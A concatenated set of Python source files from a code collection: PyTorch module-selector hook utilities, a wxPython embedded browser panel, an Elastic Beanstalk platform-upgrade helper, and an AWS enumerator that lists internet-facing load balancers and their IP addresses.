if prop is None: return self._children.items()
return ((k, v) for k, v in self._children.items() if prop in v)
@k1lib.patch(ModuleSelector)
def children(self, prop:str=None) -> Iterator[ModuleSelector]:
"""Get all direct childs.
:param prop: Filter property. See also: :meth:`__contains__`"""
return (x for _, x in self.named_children(prop))
@k1lib.patch(ModuleSelector, "directParams")
@property
def directParams(self) -> Dict[str, nn.Parameter]:
"""Dict params directly under this module"""
return {name: param for name, param in self.nn.named_parameters() if "." not in name}
@k1lib.patch(ModuleSelector)
def named_modules(self, prop:str=None) -> Iterator[Tuple[str, ModuleSelector]]:
"""Get all named child recursively.
Example::
modules = list(nn.Sequential(nn.Linear(3, 4), nn.ReLU()).select().named_modules())
# return 3
len(modules)
# return tuple ('0', <ModuleSelector of Linear>)
modules[1]
:param prop: Filter property. See also: :meth:`__contains__`"""
if prop != None:
yield from ((name, m) for name, m in self.named_modules() if prop in m)
return
yield self.name, self
for child in self._children.values(): yield from child.named_modules()
@k1lib.patch(ModuleSelector)
def modules(self, prop:str=None) -> Iterator[ModuleSelector]:
"""Get all child recursively.
:param prop: Filter property. See also: :meth:`__contains__`"""
for name, x in self.named_modules(prop): yield x
@k1lib.patch(ModuleSelector)
def clearProps(self) -> "ModuleSelector":
"""Clears all existing props of this and all descendants
:class:`ModuleSelector`. Example::
# returns False
"b" in nn.Linear(3, 4).select("*:b").clearProps()"""
def applyF(self): self.props = []
self.apply(applyF); return self
@k1lib.patch(ModuleSelector, name="deepestDepth")
@property
def deepestDepth(self):
"""Deepest depth of the tree. If self doesn't
    have any children, then the depth is 0"""
if len(self._children) == 0: return 0
return 1 + max([child.deepestDepth for child in self._children.values()])
@k1lib.patch(ModuleSelector)
def __repr__(self, intro:bool=True, header:Union[str, Tuple[str]]="", footer="", tabs:int=None):
"""
:param intro: whether to include a nice header and footer info
:param header:
str: include a header that starts where `displayF` will start
Tuple[str, str]: first one in tree, second one in displayF section
    :param footer: same thing as header, but at the end
:param tabs: number of tabs at the beginning. Best to leave this empty
"""
if tabs == None: tabs = 5 + self.deepestDepth
answer = "ModuleSelector:\n" if intro else ""
if header:
h1, h2 = ("", header) if isinstance(header, str) else header
answer += h1.ljust(tabs*4, " ") + h2 + "\n"
answer += f"{self.name}: {self.nn.__class__.__name__}".ljust(tabs*4, " ")
answer += self.displayF(self) + ("\n" if len(self._children) > 0 else "")
answer += k1lib.tab("\n".join([child.__repr__(tabs=tabs-1, intro=False) for name, child in self._children.items()]))
if footer:
f1, f2 = ("", footer) if isinstance(footer, str) else footer
answer += "\n" + f1.ljust(tabs*4, " ") + f2
if intro: answer += f"""\n\nCan...
- mS.deepestDepth: get deepest depth possible
- mS.nn: get the underlying nn.Module object
- mS.apply(f): apply to self and all descendants
- "HookModule" in mS: whether this module has a specified prop
- mS.highlight(prop): highlights all modules with specified prop
- mS.parse([..., ...]): parses extra css
- mS.directParams: get Dict[str, nn.Parameter] that are directly under this module"""
return answer
def _strTensor(t): return "None" if t is None else f"{t.shape}"
def strTensorTuple(ts):
if len(ts) > 1:
shapes = "\n".join(f"- {_strTensor(t)}" for t in ts)
return f"tensors ({len(ts)} total) shapes:\n{shapes}"
else:
return f"tensor shape: {_strTensor(ts[0])}"
@k1lib.patch(ModuleSelector)
@contextmanager
def hookF(self, f:Callable[[ModuleSelector, "torch.nn.Module", Tuple[torch.Tensor], torch.Tensor], None]=None, prop:str="*"):
"""Context manager for applying forward hooks.
Example::
def f(mS, m, i, o):
print(i, o)
m = nn.Linear(3, 4)
with m.select().hookF(f):
m(torch.randn(2, 3))
    :param f: hook callback, should accept the :class:`ModuleSelector`, the hooked :class:`torch.nn.Module`, its inputs and its output. If not specified, it prints out input and output tensor shapes
    :param prop: filter property of modules to hook onto"""
    if f is None: f = lambda mS, m, i, o: print(f"Forward hook {m}:\n" + k1lib.tab(f"Input {strTensorTuple(i)}\nOutput tensor shape: {o.shape}"))
    g = lambda m, i, o: f(self, m, i, o)
handles = [m.nn.register_forward_hook(g) for m in self.modules(prop)]
try: yield
finally:
for h in handles: h.remove()
@k1lib.patch(ModuleSelector)
@contextmanager
def hookFp(self, f=None, prop:str="*"):
"""Context manager for applying forward pre hooks.
Example::
def f(mS, m, i):
print(i)
m = nn.Linear(3, 4)
with m.select().hookFp(f):
m(torch.randn(2, 3))
    :param f: hook callback, should accept the :class:`ModuleSelector`, the hooked :class:`torch.nn.Module` and its inputs. If not specified, it prints out input tensor shapes
    :param prop: filter property of modules to hook onto"""
    if f is None: f = lambda mS, m, i: print(f"Forward pre hook {m}:\n" + k1lib.tab(f"Input {strTensorTuple(i)}"))
    g = lambda m, i: f(self, m, i)
handles = [m.nn.register_forward_pre_hook(g) for m in self.modules(prop)]
try: yield
finally:
for h in handles: h.remove()
@k1lib.patch(ModuleSelector)
@contextmanager
def hookB(self, f=None, prop:str="*"):
"""Context manager for applying backward hooks.
Example::
def f(mS, m, i, o):
print(i, o)
m = nn.Linear(3, 4)
with m.select().hookB(f):
m(torch.randn(2, 3)).sum().backward()
    :param f: hook callback, should accept the :class:`ModuleSelector`, the hooked :class:`torch.nn.Module`, its grad inputs and grad outputs. If not specified, it prints out grad input and output tensor shapes
    :param prop: filter property of modules to hook onto"""
    if f is None: f = lambda mS, m, i, o: print(f"Backward hook {m}:\n" + k1lib.tab(f"Input {strTensorTuple(i)}\nOutput {strTensorTuple(o)}"))
    g = lambda m, i, o: f(self, m, i, o)
handles = [m.nn.register_full_backward_hook(g) for m in self.modules(prop)]
try: yield
finally:
for h in handles: h.remove()
from contextlib import ExitStack
@contextmanager
def _freeze(self, value:bool, prop:str):
with ExitStack() as stack:
for m in self.modules(prop):
stack.enter_context(m.nn.gradContext())
m.nn.requires_grad_(value)
try: yield
finally: pass
@k1lib.patch(ModuleSelector)
def freeze(self, prop:str="*"):
"""Returns a context manager that freezes (set requires_grad to False) parts of
the network. Example::
l = k1lib.Learner.sample()
w = l.model.lin1.lin.weight.clone() # weights before
with l.model.select("#lin1").freeze():
l.run(1)
# returns True
(l.model.lin1.lin.weight == w).all()"""
return _freeze(self, False, prop)
@k1lib.patch(ModuleSelector)
def unfreeze(self, prop:str="*"):
"""Returns a context manager that unfreezes (set requires_grad to True) parts of
the network. Example::
l = k1lib.Learner.sample()
w = l.model.lin1.lin.weight.clone() # weights before
with l.model.select("#lin1").freeze():
with l.model.select("#lin1 > #lin").unfreeze():
l.run(1)
# returns False
(l.model.lin1.lin.weight == w).all()"""
return _freeze(self, True, prop) | 2.984375 | 3 |
plugins/General/wxRaven_WebBrowser.py | sLiinuX/wxRaven | 11 | 10897 | <reponame>sLiinuX/wxRaven<gh_stars>10-100
'''
Created on 22 Feb. 2022
@author: slinux
'''
from .wxRavenGeneralDesign import wxRavenWebBrowser
from wxRavenGUI.application.wxcustom.CustomLoading import *
from wxRavenGUI.application.wxcustom import *
import wx.html2 as webview
import sys
import logging
from wxRavenGUI.application.wxcustom.CustomUserIO import UserAdvancedMessage
class wxRaven_WebBrowserLogic(wxRavenWebBrowser):
'''
    Embedded web browser view panel for wxRaven.
'''
#
# Datas for the plugin display style
#
#
view_base_name = "WebBrowser"
view_name = "WebBrowser"
parent_frame = None
default_position = "main"
icon = 'internal_browser'#wx.Bitmap( u"res/default_style/normal/help_view.png", wx.BITMAP_TYPE_ANY )
def __init__(self, parentFrame, position = "main", viewName= "WebBrowser", isInternalPluginView=False, url=''):
'''
Constructor
'''
super().__init__(parent=parentFrame)
#
# Your constructor here
#
self.view_base_name = "WebBrowser"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self._loadingPanel = None
parentFrame.RessourcesProvider.ApplyThemeOnPanel(self)
#This is to add the view in the appropriate place using the mainapp to do so
#
#The only exception is when the pannel itself is called by the plugin or another view
#In this case the position in main app must not be managed (see rpc command panel as example)
#
if not isInternalPluginView:
parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
#is_windows = hasattr(sys, 'getwindowsversion')
#if is_windows:
# self.WindowsSetup()
self.wv=wxRavenWebview.GetWebView(self.m_webPan)
'''
is_windows = hasattr(sys, 'getwindowsversion')
if is_windows:
webview.WebView.MSWSetEmulationLevel(webview.WEBVIEWIE_EMU_IE11)
_backend = self.GetAvailableBackend(_windows=True)
if _backend == None:
UserAdvancedMessage(parentFrame, "Unable to find a backend for the webview, \n please verify you do have the webview component or download it (url in details)", "Error", "https://developer.microsoft.com/en-us/microsoft-edge/webview2/", showCancel=False)
self.wv = webview.WebView.New(self, backend=_backend)
else:
self.wv= webview.WebView.New(self)
'''
self.bSizer1 = wx.BoxSizer( wx.VERTICAL )
self.bSizer1.Add( self.wv, 1, wx.ALL|wx.EXPAND, 5 )
self.m_webPan.SetSizer( self.bSizer1 )
self.Layout()
self.m_buttonGo.Bind(wx.EVT_BUTTON,self.GetUrl )
if url == '':
pass
#self.LoadRavencoinIPFS()
else:
            self.OpenUrl(url)  # OpenUrl updates the address bar and loads the page; GetURL is not defined on this class
def UpdateView(self, evt=None):
pass
def GetUrl(self, evt):
url = self.m_textCtrlURL.GetValue()
self.wv.LoadURL(url)
def OpenUrl(self, url_text, _writeInAddress=True):
if _writeInAddress:
self.m_textCtrlURL.SetValue(url_text)
self.wv.LoadURL(url_text)
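# Illustrative instantiation sketch (not part of the original file; "mainFrame" is a
# hypothetical wxRaven main frame object; in practice the plugin loader constructs this view):
#   panel = wxRaven_WebBrowserLogic(mainFrame, position='main',
#                                   viewName='WebBrowser', url='https://ravencoin.org')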
| 1.960938 | 2 |
backend/pollr-eb2/lib/python3.5/site-packages/ebcli/operations/upgradeops.py | saarthak24/Pollr | 2 | 10898 | # Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from ebcli.objects.platform import PlatformVersion
from ..resources.strings import prompts
from ..resources.statics import namespaces, option_names
from ..core import io
from ..lib import elasticbeanstalk
from . import commonops
def _get_warning_message(confirm, single, rolling_enabled, webserver, noroll):
if confirm:
return None
elif single:
return prompts['upgrade.singleinstance']
elif not rolling_enabled and noroll:
return prompts['upgrade.norollingforce']
elif not rolling_enabled:
if webserver:
type = 'Health'
else:
type = 'Time'
return prompts['upgrade.norollingapply'].format(type)
elif rolling_enabled:
return prompts['upgrade.rollingupdate']
def _should_add_rolling(single, rolling_enabled, noroll):
if noroll:
return False
if single:
return False
if rolling_enabled:
return False
return True
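# Quick reference, derived from the logic above: rolling updates are only added when
# the environment is load balanced, rolling updates are not already enabled, and the
# caller did not ask to skip them, e.g.
#   _should_add_rolling(single=False, rolling_enabled=False, noroll=False)  # -> True
#   _should_add_rolling(single=True,  rolling_enabled=False, noroll=False)  # -> False
#   _should_add_rolling(single=False, rolling_enabled=True,  noroll=False)  # -> False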
def upgrade_env(app_name, env_name, timeout, confirm, noroll):
env = elasticbeanstalk.get_environment_settings(app_name, env_name)
latest = commonops.get_latest_solution_stack(env.platform.version)
if latest == env.platform:
io.echo(prompts['upgrade.alreadylatest'])
return
else:
single = elasticbeanstalk.get_option_setting(
env.option_settings, namespaces.ENVIRONMENT,
'EnvironmentType') == 'SingleInstance'
rolling_enabled = elasticbeanstalk.get_option_setting(
env.option_settings, namespaces.ROLLING_UPDATES,
option_names.ROLLING_UPDATE_ENABLED) == 'true'
webserver = env.tier.name.lower() == 'webserver'
io.echo()
io.echo(prompts['upgrade.infodialog'].format(env_name))
io.echo('Current platform:', env.platform)
io.echo('Latest platform: ', latest)
io.echo()
warning = _get_warning_message(confirm, single,
rolling_enabled, webserver, noroll)
if warning:
io.log_warning(warning)
io.echo(prompts['upgrade.altmessage'])
io.echo()
if not confirm:
# Get confirmation
io.validate_action(prompts['upgrade.validate'], env.name)
add_rolling = _should_add_rolling(single, rolling_enabled, noroll)
do_upgrade(env_name, add_rolling, timeout, latest.name,
health_based=webserver, platform_arn = latest.version)
def do_upgrade(env_name, add_rolling, timeout, solution_stack_name,
health_based=False, platform_arn=None):
if add_rolling:
if health_based:
roll_type = 'Health'
else:
roll_type = 'Time'
changes = [
elasticbeanstalk.create_option_setting(
namespaces.ROLLING_UPDATES,
option_names.ROLLING_UPDATE_ENABLED,
'true'),
elasticbeanstalk.create_option_setting(
namespaces.ROLLING_UPDATES,
option_names.ROLLING_UPDATE_TYPE,
roll_type)
]
io.log_warning(prompts['upgrade.applyrolling'].format(roll_type))
else:
changes = None
if PlatformVersion.is_valid_arn(platform_arn):
commonops.update_environment(
env_name, changes, None, timeout=timeout,
platform_arn=platform_arn)
else:
commonops.update_environment(
env_name, changes, None, timeout=timeout,
solution_stack_name=solution_stack_name) | 1.78125 | 2 |
src/perimeterator/enumerator/elb.py | vvondra/perimeterator | 0 | 10899 | ''' Perimeterator - Enumerator for AWS ELBs (Public IPs). '''
import logging
import boto3
from perimeterator.helper import aws_elb_arn
from perimeterator.helper import dns_lookup
class Enumerator(object):
''' Perimeterator - Enumerator for AWS ELBs (Public IPs). '''
# Required for Boto and reporting.
SERVICE = 'elb'
def __init__(self, region):
self.logger = logging.getLogger(__name__)
self.region = region
self.client = boto3.client(self.SERVICE, region_name=region)
def get(self):
''' Attempt to get all Public IPs from ELBs. '''
resources = []
# Iterate over results until AWS no longer returns a 'NextMarker' in
# order to ensure all results are retrieved.
marker = ''
while marker is not None:
# Unfortunately, Marker=None or Marker='' is invalid for this API
# call, so it looks like we can't just set this to a None value,
# or use a ternary here.
if marker:
candidates = self.client.describe_load_balancers(
Marker=marker
)
else:
candidates = self.client.describe_load_balancers()
# Check if we need to continue paging.
if "NextMarker" in candidates:
self.logger.debug(
"'NextMarker' found, additional page of results to fetch"
)
marker = candidates["NextMarker"]
else:
marker = None
# For some odd reason the AWS API doesn't appear to allow a
# filter on describe operations for ELBs, so we'll have to filter
# manually.
for elb in candidates["LoadBalancerDescriptions"]:
self.logger.debug(
"Inspecting ELB %s", elb["LoadBalancerName"],
)
if elb["Scheme"] != "internet-facing":
self.logger.debug("ELB is not internet facing")
continue
# Lookup the DNS name for this ELB to get the current IPs. We
# also need to construct the ARN, as it's not provided in the
# output from a describe operation (?!)
resources.append({
"service": self.SERVICE,
"identifier": aws_elb_arn(
self.region,
elb["LoadBalancerName"]
),
"cname": elb["DNSName"],
"addresses": dns_lookup(elb["DNSName"]),
})
self.logger.info("Got IPs for %s resources", len(resources))
return resources
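# Illustrative usage sketch (not part of the original file; assumes AWS credentials are
# configured and the region name is an arbitrary example):
#   enumerator = Enumerator('us-east-1')
#   for resource in enumerator.get():
#       print(resource['identifier'], resource['cname'], resource['addresses'])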
| 2.640625 | 3 |